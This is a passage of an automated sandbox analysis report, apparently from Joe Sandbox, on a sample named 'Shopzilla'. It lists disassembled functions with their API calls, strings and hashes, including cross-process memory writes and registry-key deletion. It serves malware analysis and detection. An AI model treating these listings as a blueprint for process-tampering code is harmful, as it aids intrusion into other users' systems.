                                              • Instruction ID: a4b0a17a2a01c24d5b8471fc574dafbcb4dd5c3b3820805fcf62f18b4d8ee314
                                              • Opcode Fuzzy Hash: 90733a4f27f37ee89cf81655d48710f343037da923c58d69d0998360cbc3b98c
                                              • Instruction Fuzzy Hash: 3BF0AF72210208AFEB100FA89CCDF7B3BACEF49759B200059FA44C3150CA62DC04DB60
                                              APIs
                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00BF8B22
                                              • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00BF8B2C
                                              • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00BF8B3B
                                              • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00BF8B42
                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00BF8B58
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                              • String ID:
                                              • API String ID: 44706859-0
                                              • Opcode ID: e975d4905c96f957d595d2ed7eb6376b9f759462133169e47675af936834bcc4
                                              • Instruction ID: c26f34b7b42cbf56158e07c354c0327b9b32bcbdc14b0f2548d5a45f63dfd0c3
                                              • Opcode Fuzzy Hash: e975d4905c96f957d595d2ed7eb6376b9f759462133169e47675af936834bcc4
                                              • Instruction Fuzzy Hash: 88F0AF72214208AFEB110FA4EC98F7B3BACEF49B55B2000A9FA44C7150DA61D804DB60
                                              APIs
                                              • GetDlgItem.USER32(?,000003E9), ref: 00BFCB73
                                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 00BFCB8A
                                              • MessageBeep.USER32(00000000), ref: 00BFCBA2
                                              • KillTimer.USER32(?,0000040A), ref: 00BFCBBE
                                              • EndDialog.USER32(?,00000001), ref: 00BFCBD8
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: BeepDialogItemKillMessageTextTimerWindow
                                              • String ID:
                                              • API String ID: 3741023627-0
                                              • Opcode ID: 36da73588c8ed37c93a52f47e765164c96ca9d13b14e7157f229dfb6d55ed5ba
                                              • Instruction ID: 0d40d3c59337c7d85b456b6aff49696940ca73ce0f26b064918cb791f4efd984
                                              • Opcode Fuzzy Hash: 36da73588c8ed37c93a52f47e765164c96ca9d13b14e7157f229dfb6d55ed5ba
                                              • Instruction Fuzzy Hash: 3A01A73545070CABEB215B10DD5FFA67BB8FB00705F000699FA82610D2D7E069988E90
                                              APIs
                                              • EndPath.GDI32(?), ref: 00BA179B
                                              • StrokeAndFillPath.GDI32(?,?,00BDBAF9,00000000,?), ref: 00BA17B7
                                              • SelectObject.GDI32(?,00000000), ref: 00BA17CA
                                              • DeleteObject.GDI32 ref: 00BA17DD
                                              • StrokePath.GDI32(?), ref: 00BA17F8
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Path$ObjectStroke$DeleteFillSelect
                                              • String ID:
                                              • API String ID: 2625713937-0
                                              • Opcode ID: 395d389b701dbcc2647af6fb423b93794283a3f7d967d32134127e6bbe6619d7
                                              • Instruction ID: 6661e1f83d241aa1e40fc72fbebac218bcaa0e4ff558005047c06c2647cadcad
                                              • Opcode Fuzzy Hash: 395d389b701dbcc2647af6fb423b93794283a3f7d967d32134127e6bbe6619d7
                                              • Instruction Fuzzy Hash: DEF0EC71018608EBDB659F2AED5C75D3FA4E706326F148254F42A9A0F0C7714995DF10
                                              APIs
                                              • CoInitialize.OLE32(00000000), ref: 00C0C8E2
                                              • CoCreateInstance.OLE32(00C33D3C,00000000,00000001,00C33BAC,?), ref: 00C0C8FA
                                                • Part of subcall function 00BB1A36: _memmove.LIBCMT ref: 00BB1A77
                                              • CoUninitialize.OLE32 ref: 00C0CB67
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: CreateInitializeInstanceUninitialize_memmove
                                              • String ID: .lnk
                                              • API String ID: 2683427295-24824748
                                              • Opcode ID: 5df0499905edf0bd9e5e2f46c0b23d220aadbb156e8bbd8590bd135c929daa13
                                              • Instruction ID: 02198a4de67ba1364654bc29d1fc52f84d39cf554a94df151cca0e7981eb9c59
                                              • Opcode Fuzzy Hash: 5df0499905edf0bd9e5e2f46c0b23d220aadbb156e8bbd8590bd135c929daa13
                                              • Instruction Fuzzy Hash: 12A13C71108205AFD300EF64D891EAFB7E8EF95718F40496CF15597292EBB0EE49CB92
                                              APIs
                                                • Part of subcall function 00BC0F16: std::exception::exception.LIBCMT ref: 00BC0F4C
                                                • Part of subcall function 00BC0F16: __CxxThrowException@8.LIBCMT ref: 00BC0F61
                                                • Part of subcall function 00BB1A36: _memmove.LIBCMT ref: 00BB1A77
                                                • Part of subcall function 00BB1680: _memmove.LIBCMT ref: 00BB16DB
                                              • __swprintf.LIBCMT ref: 00BAE598
                                              Strings
                                              • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00BAE431
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                              • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                              • API String ID: 1943609520-557222456
                                              • Opcode ID: 3d05d4ff50da5c37c48aaa7882e20c2ee322c3670145930bd907bb7a1d75872d
                                              • Instruction ID: e0ecab9ae99c979c6deec4daaa0c62319959bbd0e5eb1a08eab4870e3338ad31
                                              • Opcode Fuzzy Hash: 3d05d4ff50da5c37c48aaa7882e20c2ee322c3670145930bd907bb7a1d75872d
                                              • Instruction Fuzzy Hash: F9919C715182019FC724EF28D895DBEB7E8EF96304F40499DF492972A1EB70EE44CB92
                                              APIs
                                                • Part of subcall function 00BC01AF: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BB2A58,?,00008000), ref: 00BC01CF
                                              • CoInitialize.OLE32(00000000), ref: 00C0BE6B
                                              • CoCreateInstance.OLE32(00C33D3C,00000000,00000001,00C33BAC,?), ref: 00C0BE84
                                              • CoUninitialize.OLE32 ref: 00C0BEA1
                                                • Part of subcall function 00BA4D37: __itow.LIBCMT ref: 00BA4D62
                                                • Part of subcall function 00BA4D37: __swprintf.LIBCMT ref: 00BA4DAC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                              • String ID: .lnk
                                              • API String ID: 2126378814-24824748
                                              • Opcode ID: b898a4c7dbc00eb28f6f95dcca9f3a4f5bd52de5d7d39ea464def332cd8bf7f3
                                              • Instruction ID: 14ba924e752b633626619f5841cdf057dac81f329d96898dc424ea982dcf1609
                                              • Opcode Fuzzy Hash: b898a4c7dbc00eb28f6f95dcca9f3a4f5bd52de5d7d39ea464def332cd8bf7f3
                                              • Instruction Fuzzy Hash: F1A135756043059FCB10DF54C884E6ABBE5FF89314F148998F8A99B3A1CB31ED45CB91
                                              APIs
                                              • __startOneArgErrorHandling.LIBCMT ref: 00BC51FD
                                                • Part of subcall function 00BD0250: __87except.LIBCMT ref: 00BD028B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: ErrorHandling__87except__start
                                              • String ID: pow
                                              • API String ID: 2905807303-2276729525
                                              • Opcode ID: 3ee648933062c9ff0eee77374199c07aa98a4efa22dc02e85eeae186c536dfbd
                                              • Instruction ID: 144553736e211ccf59625202f0ae8917ff78cd24211c0699c6cab2207c24469d
                                              • Opcode Fuzzy Hash: 3ee648933062c9ff0eee77374199c07aa98a4efa22dc02e85eeae186c536dfbd
                                              • Instruction Fuzzy Hash: F9519A70929A0287CB217714DC85B6EBBD4DB40760F2489DEF0C5863A9FF349CD49A5A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: #$+
                                              • API String ID: 0-2552117581
                                              • Opcode ID: 2fd269cc021515431eca59afa873486985c374a5c950f2b676e1a57c1796dca6
                                              • Instruction ID: 0f45bb86dfd03cced3313ca566cc026eba2501c6d24700427b9855983a3486f8
                                              • Opcode Fuzzy Hash: 2fd269cc021515431eca59afa873486985c374a5c950f2b676e1a57c1796dca6
                                              • Instruction Fuzzy Hash: B351217150421AEFDF15AF28C490AFA7BE4EF65310F5440AAFD81AB291CB30DC5ACB60
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: _memset$_memmove
                                              • String ID: ERCP
                                              • API String ID: 2532777613-1384759551
                                              • Opcode ID: 480df0d93996e0746530bf3cfe1104755bd9b3bb39a140171801d112300276f2
                                              • Instruction ID: 7f7eec62a88c65708989e95337ab11062759df0c99889cecbd1cc4040cb5e486
                                              • Opcode Fuzzy Hash: 480df0d93996e0746530bf3cfe1104755bd9b3bb39a140171801d112300276f2
                                              • Instruction Fuzzy Hash: E5519371900709DBDB24DF65C8917FABBF4EF04304F2449AEE94ADB241E7B49A45CB41
                                              APIs
                                                • Part of subcall function 00C01B27: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00BF9C31,?,?,00000034,00000800,?,00000034), ref: 00C01B51
                                              • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00BFA1DA
                                                • Part of subcall function 00C01AF2: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00BF9C60,?,?,00000800,?,00001073,00000000,?,?), ref: 00C01B1C
                                                • Part of subcall function 00C01A49: GetWindowThreadProcessId.USER32(?,?), ref: 00C01A74
                                                • Part of subcall function 00C01A49: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00BF9BF5,00000034,?,?,00001004,00000000,00000000), ref: 00C01A84
                                                • Part of subcall function 00C01A49: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00BF9BF5,00000034,?,?,00001004,00000000,00000000), ref: 00C01A9A
                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00BFA247
                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00BFA294
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                              • String ID: @
                                              • API String ID: 4150878124-2766056989
                                              • Opcode ID: 34a2cc95883b1aad64e6375f2a3d1889fdbaff510ac246d9148230d6af819d69
                                              • Instruction ID: 3d30974c8b8a0f149c52a0dbbfcae25748f16e3b50893d177d3f7619bff43bc7
                                              • Opcode Fuzzy Hash: 34a2cc95883b1aad64e6375f2a3d1889fdbaff510ac246d9148230d6af819d69
                                              • Instruction Fuzzy Hash: 78412C72A0121CAFDB14DFA4CC81BEEBBB8EF49300F144095FA45B7191DA71AE49DB61
                                              APIs
                                              • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00C2784E
                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00C27862
                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00C27886
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: MessageSend$Window
                                              • String ID: SysMonthCal32
                                              • API String ID: 2326795674-1439706946
                                              • Opcode ID: 35aea31fcf31ac5624cb3ce1578ebaa78901e0a29b8acd77650751053fb63f6c
                                              • Instruction ID: 7fa911068653849ade3a73df56f14c85582237b1dc9958c482e9254c3427e0cf
                                              • Opcode Fuzzy Hash: 35aea31fcf31ac5624cb3ce1578ebaa78901e0a29b8acd77650751053fb63f6c
                                              • Instruction Fuzzy Hash: 6A218D32614229ABDF11DE54DC86FEA3B79EF88714F110214FE557B1D0D6B1AC50DB90
                                              APIs
                                              • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00C27128
                                              • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00C27138
                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00C2715D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: MessageSend$MoveWindow
                                              • String ID: Listbox
                                              • API String ID: 3315199576-2633736733
                                              • Opcode ID: 0dc2a8c0797b2c65b6ef0c4b6deb34d1709d8c441493e960fdc17fb31c9f8684
                                              • Instruction ID: b10311e05aba45118389d0af242d1ff38d06470651253a6f03222cd996bc3a16
                                              • Opcode Fuzzy Hash: 0dc2a8c0797b2c65b6ef0c4b6deb34d1709d8c441493e960fdc17fb31c9f8684
                                              • Instruction Fuzzy Hash: 2221D132614128BFDF158F54EC85FBF37BAEF89760F118224FA149B190C671AC519BA0
                                              APIs
                                              • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00C27B5F
                                              • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00C27B74
                                              • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00C27B81
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID: msctls_trackbar32
                                              • API String ID: 3850602802-1010561917
                                              • Opcode ID: bf2f379b5b19f21370b4502b4462009c72efb1aea571964c283321a09ba7ea31
                                              • Instruction ID: 88e3ee9a4f5139ba07cd2d39bfe8ada08759cd18356ed66fbf5013a38b060669
                                              • Opcode Fuzzy Hash: bf2f379b5b19f21370b4502b4462009c72efb1aea571964c283321a09ba7ea31
                                              • Instruction Fuzzy Hash: 8711E332244208BBDF209F75DC46FEB3BA9EF89768F110219FA55A6090D271E851DB10
                                              APIs
                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00BB4AF7,?), ref: 00BB4BB8
                                              • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00BB4BCA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: AddressLibraryLoadProc
                                              • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                              • API String ID: 2574300362-1355242751
                                              • Opcode ID: 43d2fc2c281414bc94553b517c8246b7542a5aeafd963619a95579d56d05a92f
                                              • Instruction ID: 73b52610914390339c88533ba2414c1a4395026103e8d005af9c9e69f27699b2
                                              • Opcode Fuzzy Hash: 43d2fc2c281414bc94553b517c8246b7542a5aeafd963619a95579d56d05a92f
                                              • Instruction Fuzzy Hash: F3D0C732420B128FD3308F30D818B4A72E4AF01341F208CBAD8C2C2552EBB0C880CA00
                                              APIs
                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00BB4B44,?,00BB49D4,?,?,00BB27AF,?,00000001), ref: 00BB4B85
                                              • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00BB4B97
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: AddressLibraryLoadProc
                                              • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                              • API String ID: 2574300362-3689287502
                                              • Opcode ID: 20a1d54f51667984e44e1bc6ab39920bc05085992ad90e4240b637bc19317c93
                                              • Instruction ID: 7e73efed64b9386928a9cee392b36b31d763ba972d1adf3c03185c400b51633e
                                              • Opcode Fuzzy Hash: 20a1d54f51667984e44e1bc6ab39920bc05085992ad90e4240b637bc19317c93
                                              • Instruction Fuzzy Hash: E1D01776520B128FDB309F31D829B5AB6E4AF05751F61C87AD886E2250EBB0E884CA54
                                              APIs
                                              • LoadLibraryA.KERNEL32(advapi32.dll,?,00C2145E), ref: 00C2121D
                                              • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00C2122F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: AddressLibraryLoadProc
                                              • String ID: RegDeleteKeyExW$advapi32.dll
                                              • API String ID: 2574300362-4033151799
                                              • Opcode ID: cdfecc480ddceab017c38ecb0de0231a8123c5b5041f794e6918646de1ec118a
                                              • Instruction ID: 04d22b458b3c3eab98d84737fba0ba78b36623d6ec5713ddecb6a3299b0ac543
                                              • Opcode Fuzzy Hash: cdfecc480ddceab017c38ecb0de0231a8123c5b5041f794e6918646de1ec118a
                                              • Instruction Fuzzy Hash: F5D0C231450B22CFC3208F31D80870A7AD4AF20382F248A39A891D6550E670C4C0CA00
                                              APIs
                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00BB5E3D), ref: 00BB55FE
                                              • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00BB5610
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
